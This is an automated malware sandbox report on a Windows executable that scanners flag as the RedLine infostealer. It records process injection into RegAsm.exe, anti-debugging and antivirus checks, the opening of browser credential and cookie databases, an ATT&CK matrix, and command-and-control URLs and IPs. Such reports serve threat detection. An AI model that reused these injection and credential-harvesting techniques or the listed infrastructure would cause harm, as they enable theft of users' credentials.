                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: 0_2_0086018D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,LdrInitializeThunk,LdrInitializeThunk,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,LdrInitializeThunk,LdrInitializeThunk,Wow64SetThreadContext,LdrInitializeThunk,LdrInitializeThunk,ResumeThread,ResumeThread,0_2_0086018D
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: 0_2_00C6D883 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C6D883
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: 0_2_00C790B2 mov eax, dword ptr fs:[00000030h]0_2_00C790B2
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: 0_2_00C790F6 mov eax, dword ptr fs:[00000030h]0_2_00C790F6
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: 0_2_00C7447C mov ecx, dword ptr fs:[00000030h]0_2_00C7447C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041ACF3 mov eax, dword ptr fs:[00000030h]2_2_0041ACF3
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: 0_2_00C80AD2 GetProcessHeap,0_2_00C80AD2
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: 0_2_00C6993A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C6993A
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: 0_2_00C69A96 SetUnhandledExceptionFilter,0_2_00C69A96
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: 0_2_00C69BC7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00C69BC7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00421C0B memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00421C0B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00423DCD SetUnhandledExceptionFilter,2_2_00423DCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042224F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0042224F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA242AF SetUnhandledExceptionFilter,2_2_1FA242AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA22C8E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_1FA22C8E

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara matchFile source: Process Memory Space: 56bDgH9sMQ.exe PID: 7736, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7768, type: MEMORYSTR
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: 0_2_0086018D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,LdrInitializeThunk,LdrInitializeThunk,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,LdrInitializeThunk,LdrInitializeThunk,Wow64SetThreadContext,LdrInitializeThunk,LdrInitializeThunk,ResumeThread,ResumeThread,0_2_0086018D
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004138BA CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,FindCloseChangeNotification,2_2_004138BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004137BD CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_004137BD
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 425000
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42E000
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 643000
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 8E5008
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: 0_2_00C6962C cpuid 0_2_00C6962C
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: EnumSystemLocalesW,0_2_00C7888C
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00C80870
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: EnumSystemLocalesW,0_2_00C801F9
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: EnumSystemLocalesW,0_2_00C801AE
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: GetLocaleInfoW,0_2_00C80107
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: EnumSystemLocalesW,0_2_00C80294
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00C8031F
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: GetLocaleInfoW,0_2_00C78DF2
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: GetLocaleInfoW,0_2_00C80572
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00C8069B
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: GetLocaleInfoW,0_2_00C807A1
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_00C7FF0C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,2_2_00411D31
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,2_2_1FA22112
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,2_2_1FBFFF17
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_1FA23AA3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_1FC13300
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,2_2_1FC12DF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,2_2_1FC12D38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,2_2_1FC12CB6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: 0_2_00C69834 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00C69834
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00411BEC GetProcessHeap,HeapAlloc,GetUserNameA,2_2_00411BEC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00411CBF GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,2_2_00411CBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: RegAsm.exe, 00000002.00000002.3052526377.0000000001021000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.56bDgH9sMQ.exe.c60000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 56bDgH9sMQ.exe PID: 7736, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7768, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

                Remote Access Functionality

                Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.56bDgH9sMQ.exe.c60000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 56bDgH9sMQ.exe PID: 7736, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7768, type: MEMORYSTR
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 511 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Screen Capture | 21 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Virtualization/Sandbox Evasion | LSASS Memory | 51 Security Software Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 511 Process Injection | Security Account Manager | 1 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 2 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 12 Process Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | 13 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 3 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 44 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Source | Detection | Scanner | Label | Link
                56bDgH9sMQ.exe | 79% | ReversingLabs | Win32.Trojan.RedLine | -
                56bDgH9sMQ.exe | 100% | Avira | HEUR/AGEN.1317026 | -
                56bDgH9sMQ.exe | 100% | Joe Sandbox ML | - | -
                56bDgH9sMQ.exe | 81% | Virustotal | - | Browse

                Source | Detection | Scanner | Label | Link
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sqlt[1].dll | 0% | ReversingLabs | - | -

                No Antivirus matches

                Source | Detection | Scanner | Label | Link
                t.me | 0% | Virustotal | - | Browse
                windowsupdatebg.s.llnwi.net | 0% | Virustotal | - | Browse
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                t.me | 149.154.167.99 | true | true | - | unknown
                windowsupdatebg.s.llnwi.net | 87.248.205.0 | true | false | - | unknown

                Name | Malicious | Antivirus Detection | Reputation
                https://steamcommunity.com/profiles/76561199707802586 | true | Avira URL Cloud: malware | unknown
                https://t.me/g067n | true | Avira URL Cloud: malware | unknown
                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesBAKFCB.2.drfalse
                • Avira URL Cloud: safe
                unknown
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=BGDAAK.2.drfalse
                • URL Reputation: safe
                unknown
                https://195.201.251.214:9000/sqlt.dllRegAsm.exe, 00000002.00000002.3052745059.00000000010F1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3052425504.0000000000F4F000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://195.201.251.214:9000MicrosoftRegAsm.exe, 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IP               Domain   Country         ASN    ASN Name      Malicious
                195.201.251.214  unknown  Germany         24940  HETZNER-ASDE  false
                149.154.167.99   t.me     United Kingdom  62041  TELEGRAMRU    true
                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1465067
                Start date and time:2024-07-01 09:11:12 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 6m 1s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:15
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:56bDgH9sMQ.exe
                renamed because original name is a hash value
                Original Sample Name:f88272ea7674d3acedd8adcf7643c598.exe
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winEXE@6/14@5/2
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 97%
                • Number of executed functions: 72
                • Number of non-executed functions: 236
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, MoUsoCoreWorker.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 87.248.205.0, 20.42.65.92
                • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, arc.msn.com, wu-b-net.trafficmanager.net, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes were analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing disassembly code.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                Time      Type             Description
                03:12:36  API Interceptor  1x Sleep call for process: RegAsm.exe modified
                03:12:44  API Interceptor  1x Sleep call for process: WerFault.exe modified
                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                  Category:dropped
                                                  Size (bytes):159744
                                                  Entropy (8bit):0.7873599747470391
                                                  Encrypted:false
                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                  Category:dropped
                                                  Size (bytes):106496
                                                  Entropy (8bit):1.1358696453229276
                                                  Encrypted:false
                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                  Category:dropped
                                                  Size (bytes):40960
                                                  Entropy (8bit):0.8553638852307782
                                                  Encrypted:false
                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                  Category:dropped
                                                  Size (bytes):28672
                                                  Entropy (8bit):2.5793180405395284
                                                  Encrypted:false
                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                  Category:dropped
                                                  Size (bytes):126976
                                                  Entropy (8bit):0.47147045728725767
                                                  Encrypted:false
                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                  Category:modified
                                                  Size (bytes):114688
                                                  Entropy (8bit):0.9746603542602881
                                                  Encrypted:false
                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                  Malicious:false
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):65536
                                                  Entropy (8bit):0.7141782392681953
                                                  Encrypted:false
                                                  SSDEEP:96:OGVjgFTB2DsZhq+1yDfRgBQXIDcQvc6QcEVcw3cE/f+HbHg/PB6HeaOy1H3a9/ZV:OUsv2DfN0BU/4jGGzuiFQZ24IO83Y
                                                  MD5:4A7E275B6A47B23578B7379B47342F3F
                                                  SHA1:9BB7758BF2F4BB42579836FED5BCC160F46406FA
                                                  SHA-256:52E5C4F490650EB7585B55E01AE9EC285E1D990D81F35D6EE2B4B7644523716A
                                                  SHA-512:32A2382E08951B2C4073D11C63C14B341CE4C4643A6051BC9F0721CDA823D9B6E71AAED84BC7E187F62C54CFF0E849ED42A09B5760C685147389A4756DC322B3
                                                  Malicious:true
                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.4.2.9.1.5.3.7.5.8.2.5.5.3.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.4.2.9.1.5.3.7.9.7.3.1.7.1.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.b.f.8.3.4.f.7.-.d.4.7.6.-.4.e.1.0.-.b.c.4.d.-.9.6.a.4.0.1.5.6.e.b.b.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.2.4.8.7.7.9.0.-.2.8.a.7.-.4.9.3.f.-.b.0.5.4.-.3.0.c.7.8.9.e.e.5.9.5.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.5.6.b.D.g.H.9.s.M.Q...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.3.8.-.0.0.0.1.-.0.0.1.4.-.b.7.7.c.-.6.f.0.1.8.6.c.b.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.8.f.6.e.1.2.5.0.b.f.6.6.6.7.9.3.c.f.d.c.2.7.d.6.d.1.6.9.3.1.b.0.0.0.0.f.f.f.f.!.0.0.0.0.0.0.6.6.f.d.4.4.e.2.c.d.9.2.9.3.a.f.4.1.4.f.7.3.5.b.d.8.0.4.5.6.f.4.e.3.e.b.1.d.!.5.6.b.D.g.H.9.s.M.Q...e.x.e.....T.a.r.g.e.t.A.p.p.
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:Mini DuMP crash report, 14 streams, Mon Jul 1 07:12:17 2024, 0x1205a4 type
                                                  Category:dropped
                                                  Size (bytes):48650
                                                  Entropy (8bit):1.6840053985586496
                                                  Encrypted:false
                                                  SSDEEP:192:9tap8+Oeascea3xJgJocg1LHK/qOLnEes:HF5Gc937gJocg1zK/qb
                                                  MD5:9454163361A89B5F578A2A363BCD5E1F
                                                  SHA1:B9DC974D8FD7EB2203D7839A0A53F8F61CCB3D7A
